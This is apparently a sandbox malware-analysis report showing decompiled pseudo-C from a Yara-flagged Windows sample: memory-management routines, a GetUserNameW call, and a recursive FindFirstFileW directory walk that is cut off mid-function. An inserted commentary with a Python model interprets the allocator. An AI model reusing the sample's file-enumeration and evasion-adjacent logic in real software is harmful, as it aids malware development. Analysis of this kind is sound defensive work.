                            • Opcode Fuzzy Hash: 1d034d2b76be25e021de9249ef1b5bcb9b446cb3610b695d9b1e5c5957ac038c
                            • Instruction Fuzzy Hash: 5FF05E727402119FD714CF69D8806A577E6EBAD315F20847ED185E77A0E635AC418B48
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00401388(void* __eax, void** __edx) {
                            				void* _t3;
                            				void** _t8;
                            				void* _t11;
                            				long _t14;
                            
                            				_t8 = __edx;
                            				if(__eax >= 0x100000) {
                            					_t14 = __eax + 0x0000ffff & 0xffff0000;
                            				} else {
                            					_t14 = 0x100000;
                            				}
                            				_t8[1] = _t14;
                            				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                            				_t11 = _t3;
                            				 *_t8 = _t11;
                            				if(_t11 != 0) {
                            					_t3 = E0040123C(0x41c5d4, _t8);
                            					if(_t3 == 0) {
                            						VirtualFree( *_t8, 0, 0x8000);
                            						 *_t8 = 0;
                            						return 0;
                            					}
                            				}
                            				return _t3;
                            			}







                            Statement addresses (listing order): 0x0040138b, 0x00401395, 0x004013a4, 0x00401397, 0x00401397, 0x00401397, 0x004013aa, 0x004013b7, 0x004013bc, 0x004013be, 0x004013c2, 0x004013cb, 0x004013d2, 0x004013de, 0x004013e5, 0x00000000, 0x004013e5, 0x004013d2, 0x004013ea

                            APIs
                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
                            • Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
                            • Opcode Fuzzy Hash: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
                            • Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,004A0327,2B14D0EE,?), ref: 004A0607
                            Memory Dump Source
                            • Source File: 00000000.00000002.544445284.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 76b35eb126b5d398c3241770d81ee5b7efebad686aa1f8164dd06303da8c9cbe
                            • Instruction ID: 5acd792fe4fe10f15044d530c193d518b97ccb0a94a73e11786566b3fd699169
                            • Opcode Fuzzy Hash: 76b35eb126b5d398c3241770d81ee5b7efebad686aa1f8164dd06303da8c9cbe
                            • Instruction Fuzzy Hash: B4113C76600215AFDF10CF19C880A6A77A8FFA976C7198066EC59DB302D774FD21CB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E004065E8(intOrPtr* __eax) {
                            				short _v516;
                            				signed int _t4;
                            				signed int _t5;
                            				int _t9;
                            				void* _t11;
                            				signed int _t14;
                            				void* _t18;
                            				DWORD* _t19;
                            
                            				_t4 = __eax +  *__eax;
                            				 *_t4 =  *_t4 + _t4;
                            				_t5 = _t4 | 0x5300000a;
                            				_t19 = _t18 + 0xfffffdfc;
                            				_t14 = _t5;
                            				 *_t19 = 0xff;
                            				_t9 = GetUserNameW( &_v516, _t19); // executed
                            				if(_t9 == 0) {
                            					_t11 = E00403BDC(_t14);
                            				} else {
                            					_t11 = E00403D6C(_t14, 0x100,  &_v516);
                            				}
                            				return _t11;
                            			}











                            Statement addresses (listing order): 0x004065e8, 0x004065ea, 0x004065ec, 0x004065f1, 0x004065f7, 0x004065f9, 0x0040660d, 0x00406611, 0x00406627, 0x00406613, 0x0040661e, 0x0040661e, 0x00406633

                            APIs
                            • GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: NameUser
                            • String ID:
                            • API String ID: 2645101109-0
                            • Opcode ID: 153b4ec9fa6da1239e45f29a021cf1180a625503ea610292dda7591db46c391b
                            • Instruction ID: 5a5990060c673b8f00593b581c9a0ee3644ab744bab1f058c1932740bd518d27
                            • Opcode Fuzzy Hash: 153b4ec9fa6da1239e45f29a021cf1180a625503ea610292dda7591db46c391b
                            • Instruction Fuzzy Hash: 1BE0DFB12083424FC3119BA8D880AA53BE49F49300F044876B8D5C72E1FE35CE248753
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E004065EC(signed int __eax) {
                            				short _v516;
                            				signed int _t4;
                            				int _t8;
                            				void* _t10;
                            				signed int _t13;
                            				void* _t17;
                            				DWORD* _t18;
                            
                            				_t4 = __eax | 0x5300000a;
                            				_t18 = _t17 + 0xfffffdfc;
                            				_t13 = _t4;
                            				 *_t18 = 0xff;
                            				_t8 = GetUserNameW( &_v516, _t18); // executed
                            				if(_t8 == 0) {
                            					_t10 = E00403BDC(_t13);
                            				} else {
                            					_t10 = E00403D6C(_t13, 0x100,  &_v516);
                            				}
                            				return _t10;
                            			}










                            Statement addresses (listing order): 0x004065ec, 0x004065f1, 0x004065f7, 0x004065f9, 0x0040660d, 0x00406611, 0x00406627, 0x00406613, 0x0040661e, 0x0040661e, 0x00406633

                            APIs
                            • GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: NameUser
                            • String ID:
                            • API String ID: 2645101109-0
                            • Opcode ID: 60f9d436da294c5ff49d132d20e00676374c28b1533c3170959a1c115f4756e2
                            • Instruction ID: 7803372b71e91cd4900786e151d6695f3fca8b78fda9d7e8201226f5ab6c0eae
                            • Opcode Fuzzy Hash: 60f9d436da294c5ff49d132d20e00676374c28b1533c3170959a1c115f4756e2
                            • Instruction Fuzzy Hash: D7E08CB16043065BD3109AA8D880AAA76E89B88300F00493AB89AD73D0FE39CE248647
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00403604(char* __eax, short* __ecx, int __edx, int _a4) {
                            				int _t4;
                            				int _t5;
                            
                            				_t4 =  *0x41c5a8; // 0x3
                            				_t5 = WideCharToMultiByte(_t4, 0, __ecx, _a4, __eax, __edx, 0, 0); // executed
                            				return _t5;
                            			}





                            Statement addresses (listing order): 0x00403614, 0x0040361a, 0x00403620

                            APIs
                            • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000001,00000000,00000000,00000001,004036B0,00000000), ref: 0040361A
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide
                            • String ID:
                            • API String ID: 626452242-0
                            • Opcode ID: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
                            • Instruction ID: 7e1ccd6cea493bd3454663dff710d39ec61ca1bdc7a044e150527f2c3e7482f1
                            • Opcode Fuzzy Hash: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
                            • Instruction Fuzzy Hash: 1EC002B22802087FE5149A9ADC46FA7769C9758B50F108029B7089E1D1D5A5B85046BC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00401464(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				void* _v28;
                            				intOrPtr* _v32;
                            				intOrPtr* _t24;
                            				intOrPtr _t27;
                            				intOrPtr _t31;
                            				int _t32;
                            				intOrPtr* _t35;
                            				intOrPtr* _t42;
                            				void* _t43;
                            				void* _t44;
                            				intOrPtr* _t45;
                            
                            				_t45 =  &_v20;
                            				_v32 = __ecx;
                            				 *_t45 = __edx;
                            				_v28 = 0xffffffff;
                            				_v24 = 0;
                            				_t44 = __eax;
                            				_v20 =  *_t45 + __eax;
                            				_t35 =  *0x41c5d4; // 0x41c5d4
                            				while(_t35 != 0x41c5d4) {
                            					_t42 =  *_t35;
                            					_t5 = _t35 + 8; // 0x0
                            					_t43 =  *_t5;
                            					if(_t44 <= _t43) {
                            						_t6 = _t35 + 0xc; // 0x0
                            						if(_t43 +  *_t6 <= _v20) {
                            							if(_t43 < _v28) {
                            								_v28 = _t43;
                            							}
                            							_t10 = _t35 + 0xc; // 0x0
                            							_t31 = _t43 +  *_t10;
                            							if(_t31 > _v24) {
                            								_v24 = _t31;
                            							}
                            							_t32 = VirtualFree(_t43, 0, 0x8000); // executed
                            							if(_t32 == 0) {
                            								 *0x41c5b0 = 1;
                            							}
                            							E0040126C(_t35);
                            						}
                            					}
                            					_t35 = _t42;
                            				}
                            				_t24 = _v32;
                            				 *_t24 = 0;
                            				if(_v24 == 0) {
                            					return _t24;
                            				}
                            				 *_v32 = _v28;
                            				_t27 = _v24 - _v28;
                            				 *((intOrPtr*)(_v32 + 4)) = _t27;
                            				return _t27;
                            			}
















                            Statement addresses (listing order): 0x00401468, 0x0040146b, 0x0040146f, 0x00401472, 0x0040147c, 0x00401480, 0x00401487, 0x0040148b, 0x004014e4, 0x00401493, 0x00401495, 0x00401495, 0x0040149a, 0x0040149e, 0x004014a5, 0x004014ab, 0x004014ad, 0x004014ad, 0x004014b3, 0x004014b3, 0x004014ba, 0x004014bc, 0x004014bc, 0x004014c8, 0x004014cf, 0x004014d1, 0x004014d1, 0x004014dd, 0x004014dd, 0x004014a5, 0x004014e2, 0x004014e2, 0x004014ec, 0x004014f2, 0x004014f9, 0x0040151b, 0x0040151b, 0x00401503, 0x00401509, 0x00401511, 0x00000000

                            APIs
                            • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004014C8
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FreeVirtual
                            • String ID:
                            • API String ID: 1263568516-0
                            • Opcode ID: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
                            • Instruction ID: bdb72b2e4f8392e9a4367bae485781504843fed35f2e07c9585e1bdde9d69fdb
                            • Opcode Fuzzy Hash: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
                            • Instruction Fuzzy Hash: 2621F770608710AFC710DF19C8C0A5BBBE5EF85760F14C96AE4989B3A5D378EC41CB9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0040151C(signed int __eax, void** __ecx, intOrPtr __edx) {
                            				signed int _v20;
                            				void** _v24;
                            				void* _t15;
                            				void** _t16;
                            				void* _t17;
                            				signed int _t27;
                            				intOrPtr* _t29;
                            				void* _t31;
                            				intOrPtr* _t32;
                            
                            				_v24 = __ecx;
                            				 *_t32 = __edx;
                            				_t31 = __eax & 0xfffff000;
                            				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                            				 *_v24 = _t31;
                            				_t15 = _v20 - _t31;
                            				_v24[1] = _t15;
                            				_t29 =  *0x41c5d4; // 0x41c5d4
                            				while(_t29 != 0x41c5d4) {
                            					_t7 = _t29 + 8; // 0x0
                            					_t17 =  *_t7;
                            					_t8 = _t29 + 0xc; // 0x0
                            					_t27 =  *_t8 + _t17;
                            					if(_t31 > _t17) {
                            						_t17 = _t31;
                            					}
                            					if(_t27 > _v20) {
                            						_t27 = _v20;
                            					}
                            					if(_t27 > _t17) {
                            						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                            						if(_t15 == 0) {
                            							_t16 = _v24;
                            							 *_t16 = 0;
                            							return _t16;
                            						}
                            					}
                            					_t29 =  *_t29;
                            				}
                            				return _t15;
                            			}












                            Statement addresses (listing order): 0x00401523, 0x00401527, 0x0040152e, 0x00401543, 0x0040154b, 0x00401551, 0x00401557, 0x0040155a, 0x0040159e, 0x00401562, 0x00401562, 0x00401565, 0x00401568, 0x0040156c, 0x0040156e, 0x0040156e, 0x00401574, 0x00401576, 0x00401576, 0x0040157c, 0x00401589, 0x00401590, 0x00401592, 0x00401598, 0x00000000, 0x00401598, 0x00401590, 0x0040159c, 0x0040159c, 0x004015ad

                            APIs
                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00401589
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
                            • Instruction ID: d2e5847c23a0d0fb2b7a3dff60909d67c0489ed435542f313e0fa7b23e2e95f5
                            • Opcode Fuzzy Hash: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
                            • Instruction Fuzzy Hash: 67115E72A44701AFC3109E29CC80A6BBBE2EBC4750F15C539E5996B3A5D734AC408B89
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E004015B0(void* __eax, void** __ecx, void* __edx) {
                            				int _t7;
                            				void* _t9;
                            				signed int _t14;
                            				intOrPtr* _t19;
                            				signed int _t22;
                            				void** _t23;
                            
                            				_push(__ecx);
                            				 *_t23 = __eax + 0x00000fff & 0xfffff000;
                            				_t22 = __eax + __edx & 0xfffff000;
                            				 *__ecx =  *_t23;
                            				_t7 = _t22 -  *_t23;
                            				__ecx[1] = _t7;
                            				_t19 =  *0x41c5d4; // 0x41c5d4
                            				while(_t19 != 0x41c5d4) {
                            					_t2 = _t19 + 8; // 0x0
                            					_t9 =  *_t2;
                            					_t3 = _t19 + 0xc; // 0x0
                            					_t14 =  *_t3 + _t9;
                            					if(_t9 <  *_t23) {
                            						_t9 =  *_t23;
                            					}
                            					if(_t22 < _t14) {
                            						_t14 = _t22;
                            					}
                            					if(_t14 > _t9) {
                            						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
                            						if(_t7 == 0) {
                            							 *0x41c5b0 = 2;
                            						}
                            					}
                            					_t19 =  *_t19;
                            				}
                            				return _t7;
                            			}









                            Statement addresses (listing order): 0x004015b4, 0x004015c5, 0x004015cc, 0x004015d5, 0x004015d9, 0x004015dc, 0x004015df, 0x0040161f, 0x004015e7, 0x004015e7, 0x004015ea, 0x004015ed, 0x004015f2, 0x004015f4, 0x004015f4, 0x004015f9, 0x004015fb, 0x004015fb, 0x004015ff, 0x0040160a, 0x00401611, 0x00401613, 0x00401613, 0x00401611, 0x0040161d, 0x0040161d, 0x0040162c

                            APIs
                            • VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,-00000008,00003FFB,00401817), ref: 0040160A
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: FreeVirtual
                            • String ID:
                            • API String ID: 1263568516-0
                            • Opcode ID: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
                            • Instruction ID: 104411973d7795ae4b76250d277c099600c8cf09cd5a8da0f47b470ca133b76a
                            • Opcode Fuzzy Hash: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
                            • Instruction Fuzzy Hash: 82012B726443105FC3109F28DDC0E6A77E5DBC5324F19493EDA85AB391D33B6C0187A8
                            Uniqueness

                            Uniqueness Score: -1.00%
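The four routines above (E00401388 reserve, E0040151C commit, E004015B0 decommit, E00401464 release) together form a virtual-memory block manager: a linked list of reserved regions headed at 0x41c5d4, reservations of at least 1 MiB rounded to 64 KiB, and commit/decommit ranges clipped to the pages of each reserved block. The protection values visible in the listings are PAGE_NOACCESS (1) for the reservation and PAGE_READWRITE (4) for the commit, never an executable protection, so these VirtualAlloc calls are heap bookkeeping rather than a code-staging stub; the pattern matches the large-block handling of a Delphi-style runtime memory manager (my assessment; the report itself does not name the compiler). The Python model below is an added illustration, not code from the report or the sample, that re-implements the rounding masks and the block walk exactly as the decompiled code shows them and records the API calls the sample would issue; the list representation, the constructed addresses and the class and method names are mine.

```python
"""Model of the reserve/commit/decommit/release logic in E00401388, E0040151C,
E004015B0 and E00401464. Added example; the sample keeps a linked list headed at
0x41c5d4, here replaced by a Python list. Constants are those in the listings."""
from typing import List, Optional, Tuple

MEM_COMMIT, MEM_RESERVE, MEM_DECOMMIT, MEM_RELEASE = 0x1000, 0x2000, 0x4000, 0x8000
PAGE_NOACCESS, PAGE_READWRITE = 0x1, 0x4
MIN_RESERVE = 0x100000  # 1 MiB minimum reservation (E00401388)


def reserve_size(requested: int) -> int:
    """E00401388: (requested + 0xffff) & 0xffff0000, but never below 1 MiB."""
    if requested >= MIN_RESERVE:
        return (requested + 0xFFFF) & 0xFFFF0000
    return MIN_RESERVE


def commit_range(addr: int, size: int) -> Tuple[int, int]:
    """E0040151C: start rounded down, end rounded up to a 4 KiB page (range grows)."""
    return addr & ~0xFFF, (addr + size + 0xFFF) & ~0xFFF


def decommit_range(addr: int, size: int) -> Tuple[int, int]:
    """E004015B0: start rounded up, end rounded down (range shrinks, so a page that is
    only partly covered by the request is never decommitted)."""
    return (addr + 0xFFF) & ~0xFFF, (addr + size) & ~0xFFF


class VirtualAllocModel:
    """Tracks reserved blocks and the VirtualAlloc/VirtualFree calls the routines issue."""

    def __init__(self) -> None:
        self.blocks: List[Tuple[int, int]] = []  # (base, size) per reserved region
        self.calls: List[tuple] = []             # (api, addr, size, flags, protect)

    def reserve(self, base: int, requested: int) -> int:
        """E00401388: VirtualAlloc(0, size, MEM_RESERVE, PAGE_NOACCESS), then list insert.
        'base' is the constructed address the OS is assumed to hand back."""
        size = reserve_size(requested)
        self.calls.append(("VirtualAlloc", 0, size, MEM_RESERVE, PAGE_NOACCESS))
        self.blocks.append((base, size))
        return size

    def _clipped(self, lo: int, hi: int) -> List[Tuple[int, int]]:
        # Shared block walk: max(base, lo) .. min(base+size, hi), acted on only if non-empty.
        out = []
        for base, bsize in self.blocks:
            s, e = max(base, lo), min(base + bsize, hi)
            if e > s:
                out.append((s, e))
        return out

    def commit(self, addr: int, size: int) -> List[Tuple[int, int]]:
        """E0040151C: VirtualAlloc(start, len, MEM_COMMIT, PAGE_READWRITE) per overlap."""
        done = self._clipped(*commit_range(addr, size))
        for s, e in done:
            self.calls.append(("VirtualAlloc", s, e - s, MEM_COMMIT, PAGE_READWRITE))
        return done

    def decommit(self, addr: int, size: int) -> List[Tuple[int, int]]:
        """E004015B0: VirtualFree(start, len, MEM_DECOMMIT) per overlap."""
        done = self._clipped(*decommit_range(addr, size))
        for s, e in done:
            self.calls.append(("VirtualFree", s, e - s, MEM_DECOMMIT, None))
        return done

    def release(self, addr: int, size: int) -> Optional[Tuple[int, int]]:
        """E00401464: VirtualFree(base, 0, MEM_RELEASE) for every block wholly inside
        [addr, addr+size); returns (lowest base, span to highest end) or None."""
        lowest: Optional[int] = None
        highest: Optional[int] = None
        keep = []
        for base, bsize in self.blocks:
            if addr <= base and base + bsize <= addr + size:
                self.calls.append(("VirtualFree", base, 0, MEM_RELEASE, None))
                lowest = base if lowest is None else min(lowest, base)
                highest = base + bsize if highest is None else max(highest, base + bsize)
            else:
                keep.append((base, bsize))
        self.blocks = keep
        if highest is None or lowest is None:
            return None
        return lowest, highest - lowest


if __name__ == "__main__":
    m = VirtualAllocModel()
    m.reserve(0x500000, 0x20000)          # constructed base address for the model
    print(m.commit(0x5FF800, 0x1000))     # clipped at the end of the reserved block
    print(m.release(0x500000, 0x100000))  # whole block released
    for call in m.calls:
        print(call)
```

The commit rounding grows the request and the decommit rounding shrinks it, which is why a page straddling the boundary of a freed range stays committed; the same asymmetry in a memory trace is a quick way to tell this allocator apart from an unpacker that commits exactly the pages it is about to write code into.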

                            Non-executed Functions

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544411405.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: .$.$.$C\.x$C\apeee$C\efee$\.x$apeee$e$e$e$e$e$e$l.x$l.x$sl.x$x$x$x
                            • API String ID: 0-254566416
                            • Opcode ID: 426ca3eb7a9548ad1b566aa284613dfef421f21e5941d9c93cf84ea490b1db87
                            • Instruction ID: dc36ecf22c787cfee8ad182f13b2db42668d6507514366c841422545bf8e1a88
                            • Opcode Fuzzy Hash: 426ca3eb7a9548ad1b566aa284613dfef421f21e5941d9c93cf84ea490b1db87
                            • Instruction Fuzzy Hash: 29E12F10A14215C9DB31AF00C4046EBB7F1FF21B18F98D5CAC0995A751FB769DC6CB9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E00413F58(char __eax, int __ebx, void* __ecx, char __edx, void* __edi, signed int __esi, char _a4, char _a8, char _a12, intOrPtr _a16, char _a20) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				intOrPtr _v20;
                            				char _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				char _v40;
                            				char _v44;
                            				char _v48;
                            				char _v52;
                            				char _v53;
                            				intOrPtr _v56;
                            				struct _WIN32_FIND_DATAW _v648;
                            				char _v652;
                            				char _v656;
                            				char _v660;
                            				char _v664;
                            				char _v668;
                            				char _v672;
                            				intOrPtr _v676;
                            				char _v680;
                            				char _v684;
                            				char _v688;
                            				char _v692;
                            				char _v696;
                            				intOrPtr _v700;
                            				char _v704;
                            				char _v708;
                            				char _v712;
                            				char _v716;
                            				char _v720;
                            				char _v724;
                            				char _v728;
                            				char _v732;
                            				char _v736;
                            				char _v740;
                            				char _v744;
                            				intOrPtr _v748;
                            				char _v752;
                            				char _v756;
                            				char _v760;
                            				char _v764;
                            				char _v768;
                            				char _v772;
                            				char _v776;
                            				char _v780;
                            				char _v784;
                            				char _v788;
                            				char _v792;
                            				void* _t239;
                            				void* _t295;
                            				intOrPtr* _t299;
                            				void* _t301;
                            				int _t312;
                            				int _t333;
                            				signed int _t343;
                            				long _t349;
                            				int _t354;
                            				int _t377;
                            				int _t383;
                            				void* _t387;
                            				intOrPtr* _t425;
                            				intOrPtr _t428;
                            				intOrPtr* _t456;
                            				int _t460;
                            				intOrPtr _t464;
                            				intOrPtr* _t471;
                            				intOrPtr _t486;
                            				intOrPtr _t496;
                            				intOrPtr _t497;
                            				intOrPtr _t499;
                            				void* _t534;
                            				void* _t556;
                            				void* _t570;
                            				void* _t573;
                            				signed int _t575;
                            				intOrPtr _t577;
                            				intOrPtr _t578;
                            				intOrPtr* _t579;
                            
                            				_t574 = __esi;
                            				_t458 = __ebx;
                            				_t577 = _t578;
                            				_push(__ecx);
                            				_t464 = 0x62;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t464 = _t464 - 1;
                            					_t580 = _t464;
                            				} while (_t464 != 0);
                            				_t1 =  &_v8;
                            				 *_t1 = _t464;
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_v16 =  *_t1;
                            				_v12 = __edx;
                            				_v8 = __eax;
                            				E00404150( &_v8);
                            				E00404150( &_v12);
                            				E00404150( &_v16);
                            				E00404150( &_a20);
                            				_push(_t577);
                            				_push(0x41475d);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t578;
                            				_v20 = 0;
                            				E004062FC(_v8,  &_v652, _t580);
                            				E00403C3C( &_v8, _v652);
                            				E0040377C( &_v656, _a20);
                            				E00407A18(0x41477c,  &_v52, _v656, _t580);
                            				E0040377C( &_v660, _v12);
                            				E00407A18(0x414788,  &_v44, _v660, _t580);
                            				_t239 = E00404648(_v44);
                            				_t581 = _t239;
                            				if(_t239 == 0) {
                            					L46:
                            					_pop(_t486);
                            					 *[fs:eax] = _t486;
                            					_push(E00414767);
                            					E00403BF4( &_v792, 2);
                            					E00403508( &_v784, 2);
                            					E00403BDC( &_v776);
                            					E00403508( &_v772, 2);
                            					E00403BF4( &_v764, 6);
                            					E004034E4( &_v740);
                            					E00403BF4( &_v736, 5);
                            					E00403508( &_v716, 3);
                            					E00403BF4( &_v704, 3);
                            					E004034E4( &_v692);
                            					E00403BDC( &_v688);
                            					E004034E4( &_v684);
                            					E00403BF4( &_v680, 5);
                            					E00403508( &_v660, 2);
                            					E00403BDC( &_v652);
                            					_t496 =  *0x405f50; // 0x405f54
                            					E00404810( &_v52, _t496);
                            					E00403BDC( &_v48);
                            					_t497 =  *0x405f50; // 0x405f54
                            					E00404810( &_v44, _t497);
                            					E00403BF4( &_v40, 4);
                            					_t499 =  *0x413f34; // 0x413f38
                            					E00404810( &_v24, _t499);
                            					E00403BF4( &_v16, 3);
                            					return E00403BDC( &_a20);
                            				} else {
                            					_push(E00404648(_v24) + 1);
                            					E00404804();
                            					_t579 = _t578 + 4;
                            					_push(_v24 + E00404648(_v24) * 4 - 4);
                            					E004078D8(_v8, __ebx,  &_v664, _t581);
                            					_pop(_t295);
                            					E00403C18(_t295, _v664);
                            					while(E00404648(_v24) > 0) {
                            						_t299 =  *0x41b218; // 0x41cac4
                            						_t34 = _t299 + 4; // 0x0
                            						_t301 =  *_t299 - 0x4b000;
                            						asm("sbb edx, 0x0");
                            						_t471 =  *0x41b3fc; // 0x41cabc
                            						_t35 = _t471 + 4; // 0x0
                            						__eflags =  *_t34 -  *_t35;
                            						if(__eflags != 0) {
                            							if(__eflags <= 0) {
                            								goto L46;
                            							}
                            							L8:
                            							E004078D8( *((intOrPtr*)(_v24 + E00404648(_v24) * 4 - 4)), _t458,  &_v28, __eflags);
                            							E00403BDC(_v24 + E00404648(_v24) * 4 - 4);
                            							_t312 = E00404648(_v24) - 1;
                            							__eflags = _t312;
                            							_push(_t312);
                            							E00404804();
                            							_t579 = _t579 + 4;
                            							E00403E14( &_v672, 0x414790, _v28, __eflags);
                            							E004078D8(_v672, _t458,  &_v668, __eflags);
                            							_t573 = FindFirstFileW(E00403D98(_v668),  &_v648);
                            							do {
                            								_push(_v28);
                            								_push(0x41479c);
                            								_t474 = 0x104;
                            								E00403D6C( &_v680, 0x104,  &(_v648.cFileName));
                            								_push(_v680);
                            								E00403E78();
                            								E004078D8(_v676, _t458,  &_v32, __eflags);
                            								E004077C8(_v32, _t458, 0x104,  &_v36, _t574, __eflags);
                            								__eflags = (_v648.dwFileAttributes & 0x00000010) - 0x10;
                            								if((_v648.dwFileAttributes & 0x00000010) == 0x10) {
                            									L21:
                            									__eflags = _a8 - 1;
                            									if(_a8 != 1) {
                            										L30:
                            										__eflags = _a12 - 1;
                            										if(_a12 != 1) {
                            											goto L43;
                            										}
                            										E00403D6C( &_v756, 0x104,  &(_v648.cFileName));
                            										E00403EC0(_v756, 0x4147c0);
                            										if(__eflags == 0) {
                            											goto L43;
                            										}
                            										E00403D6C( &_v760, 0x104,  &(_v648.cFileName));
                            										E00403EC0(_v760, 0x4147cc);
                            										if(__eflags == 0) {
                            											goto L43;
                            										}
                            										_t343 = _v648.dwFileAttributes;
                            										__eflags = (_t343 & 0x00000010) - 0x10;
                            										if((_t343 & 0x00000010) != 0x10) {
                            											goto L43;
                            										}
                            										__eflags = (_t343 & 0x00000400) - 0x400;
                            										if(__eflags == 0) {
                            											goto L43;
                            										}
                            										E004078D8(_v32, _t458,  &_v764, __eflags);
                            										_t349 = GetFileAttributesW(E00403D98(_v764));
                            										__eflags = _t349 - 0xffffffff;
                            										if(_t349 == 0xffffffff) {
                            											goto L43;
                            										}
                            										_v53 = 0;
                            										_t458 = E00404648(_v52) - 1;
                            										__eflags = _t458;
                            										if(_t458 < 0) {
                            											L41:
                            											__eflags = _v53;
                            											if(_v53 == 0) {
                            												_t354 = E00404648(_v24) + 1;
                            												__eflags = _t354;
                            												_push(_t354);
                            												E00404804();
                            												_t579 = _t579 + 4;
                            												E00403C18(_v24 + E00404648(_v24) * 4 - 4, _v32);
                            											}
                            											goto L43;
                            										}
                            										_t460 = _t458 + 1;
                            										_t575 = 0;
                            										__eflags = 0;
                            										do {
                            											E004078D8(_v32, _t460,  &_v776, __eflags);
                            											E0040377C( &_v772, _v776);
                            											E0040633C(_v772, _t460,  &_v768, _t573, _t575);
                            											_push(_v768);
                            											E00403D88( &_v792,  *((intOrPtr*)(_v52 + _t575 * 4)));
                            											E004078D8(_v792, _t460,  &_v788, __eflags);
                            											E0040377C( &_v784, _v788);
                            											E0040633C(_v784, _t460,  &_v780, _t573, _t575);
                            											_pop(_t534);
                            											_t377 = E00403AD4(_v780, _t534);
                            											__eflags = _t377;
                            											if(_t377 != 0) {
                            												_v53 = 1;
                            											}
                            											_t575 = _t575 + 1;
                            											_t460 = _t460 - 1;
                            											__eflags = _t460;
                            										} while (__eflags != 0);
                            										goto L41;
                            									}
                            									E0040377C( &_v712, _v36);
                            									E0040633C(_v712, _t458,  &_v708, _t573, _t574);
                            									_t383 = E00403AD4(0x4147a8, _v708);
                            									__eflags = _t383;
                            									if(_t383 == 0) {
                            										goto L30;
                            									}
